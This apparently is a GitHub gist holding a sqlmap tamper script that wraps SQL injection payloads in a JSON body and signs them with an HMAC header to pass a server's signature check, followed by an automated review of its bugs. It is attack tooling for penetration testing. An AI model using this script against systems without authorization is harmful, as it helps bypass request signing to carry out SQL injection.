Created
April 6, 2025 21:17
Wind010 created this gist
Apr 6, 2025 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,38 @@ #!/usr/bin/env python import hmac import hashlib import json from lib.core.data import kb from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL SECRET_KEY = b"YOUR_SECRET_KEY" def dependencies(): pass def tamper(payload, **kwargs): """ payload is the injection and not the json or full request. """ try: # We don't have access to the request so we workaround here. p = {"id": 1, "email": "*", "message": "some message"} f = p.copy() f['email'] = payload body = json.dumps(f, separators=(',', ':')) except: body=payload #print(f"DEBUG: {body}") signature = hmac.new(SECRET_KEY, body.encode(), hashlib.sha256).hexdigest() if "headers" not in kwargs: kwargs["headers"] = {} kwargs["headers"]["x-signature"] = "sha256=" + signature kwargs["headers"]["Content-Type"] = "application/json" return payload
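Review bot: The fallback `if "headers" not in kwargs: kwargs["headers"] = {}` in `tamper()` creates a dict that lives only in this call's `**kwargs`, so when the caller did not pass a `headers` mapping the `x-signature` and `Content-Type` values are set on a throwaway dict and never reach the request; only the in-place mutation of a caller-supplied dict can propagate, which is worth stating in the docstring (presumably sqlmap does pass one — confirm against the tamper API you target). The bare `except:` around the `json.dumps` call also swallows everything, including `KeyboardInterrupt`, and silently signs the raw payload instead of the JSON body, which makes a signature mismatch hard to diagnose; narrow it to `except (TypeError, ValueError):`. Since the signature is computed over a fixed template body (`{"id": 1, "email": <payload>, "message": "some message"}`) rather than the request actually sent, add a comment noting that the template, key order and `separators` must match the real request byte-for-byte or the server-side HMAC check will fail. Finally, `SECRET_KEY = b"YOUR_SECRET_KEY"` invites committing a real secret; read it from the environment instead, e.g. `SECRET_KEY = os.environ["TAMPER_HMAC_SECRET"].encode()` (variable name of your choosing) with `import os`, and drop the unused `from lib.core.data import kb`.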